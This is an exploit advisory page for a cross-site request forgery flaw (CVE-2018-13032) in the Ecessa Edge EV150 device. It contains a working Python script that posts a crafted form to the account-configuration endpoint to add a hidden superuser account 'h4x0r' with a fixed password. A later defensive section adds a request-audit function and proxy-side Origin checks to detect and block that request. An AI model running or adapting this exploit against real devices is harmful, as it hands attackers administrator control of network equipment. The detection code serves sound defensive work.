Ecessa Edge EV150 Cross-Site Request Forgery (Add Superuser)

2019.03.26
BehzaDghat (US)
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/python
#Exploit Title:
#Date: 3/25/2019
#Exploit Author: BehzaDghat
#Version: 10.7.4
#CVE : 2018-13032
# Python 2 script (print statements), as published.

import sys
import requests

# Form action that saves the user-account configuration
au='/cgi-bin/pl_web.cgi/util_configlogin_act'

def help_message():
    print """
    {} -h ---> show this message
    {} -u URL ---> start exploit
    example:
    {} -u http://target.com
    """.format(sys.argv[0],sys.argv[0],sys.argv[0])

def error_optiont():
    print """\ntype and enter {} -h""".format(sys.argv[0])

# Account form fields; slot 4 carries the new account with the superuser flag.
# The request contains no per-session anti-CSRF token.
data_fs={'savecrtcfg':'checked','user_username1':'root','user_enabled1':'on','user_passwd1':'','user_passwd_verify1':'',
'user_delete1':'','user_username2r':'admin','user_passwd2':'','user_passwd_verify2':'','user_delete2':'',
'user_username3':'user','user_enabled3':'on','user_passwd3':'','user_passwd_verify3':'','user_delete3':'',
'user_username4':'h4x0r','user_enabled4':'on','user_superuser4':'on','user_passwd4':'123123','user_passwd_verify4':'123123',
'page':'util_configlogin','val_requested_page':'user_accounts','savecrtcfg':'checked'
,'page_uuid':'3e2774f9-1cd3-4d36-a91e-eb9e42b5ba0d',
'form_has_changed':'1','submit':'Supersize!'}

if len(sys.argv)>1 and sys.argv[1]=='-h':
    help_message()
    exit()
elif len(sys.argv)==3 and sys.argv[1]=='-u':
    urlt=sys.argv[2]+au
    # Check that the form action exists before posting
    if '200' in str(requests.get(urlt)):
        print 'Send DATA'
        r=requests.post(urlt,data=data_fs)
        if '200' in str(r):
            print 'Added User'
    else:
        print 'Not Found Page'
else:
    print 'Type And Enter -> python {} -h'.format(sys.argv[0])
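A review check for the request the PoC above sends, added here as an example (it is not part of the advisory or of the vendor's code): it flags POSTs to the account action that lack a same-origin Origin/Referer and reports any account being given the superuser flag. The path and field-name pattern come from the PoC; the function names, the sample request and the addresses in it are constructed.

```python
from urllib.parse import parse_qs, urlsplit
import re

ACCOUNT_ACTION = "/cgi-bin/pl_web.cgi/util_configlogin_act"  # path from the PoC above


def source_host(headers):
    """Host part of Origin (preferred) or Referer; None when neither is usable."""
    for name in ("origin", "referer"):
        value = headers.get(name)
        if value:
            return urlsplit(value).netloc.lower() or None
    return None


def audit_request(method, path, headers, body):
    """Return findings for one HTTP request to the account-management action."""
    headers = {k.lower(): v for k, v in headers.items()}
    if method.upper() != "POST" or urlsplit(path).path != ACCOUNT_ACTION:
        return []
    findings = []
    src = source_host(headers)
    if src is None:
        findings.append("no Origin/Referer on state-changing POST")
    elif src != headers.get("host", "").lower():
        findings.append("cross-origin POST from " + src)
    form = parse_qs(body, keep_blank_values=True)
    for key, values in form.items():
        m = re.fullmatch(r"user_superuser(\d+)", key)
        if m and "on" in values:
            name = form.get("user_username" + m.group(1), ["?"])[0]
            findings.append("superuser flag set for account " + repr(name))
    return findings


# Constructed sample: a form post arriving from another site (not captured traffic).
SAMPLE = dict(
    method="POST",
    path=ACCOUNT_ACTION,
    headers={"Host": "192.0.2.10", "Origin": "http://attacker.example",
             "Content-Type": "application/x-www-form-urlencoded"},
    body="user_username4=newadmin&user_enabled4=on&user_superuser4=on"
         "&page=util_configlogin&form_has_changed=1",
)

if __name__ == "__main__":
    for finding in audit_request(**SAMPLE):
        print(finding)
```

The same Origin/Referer comparison can be enforced in a reverse proxy in front of the management interface until the device firmware validates a per-session token.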



Copyright 2019, cxsecurity.com
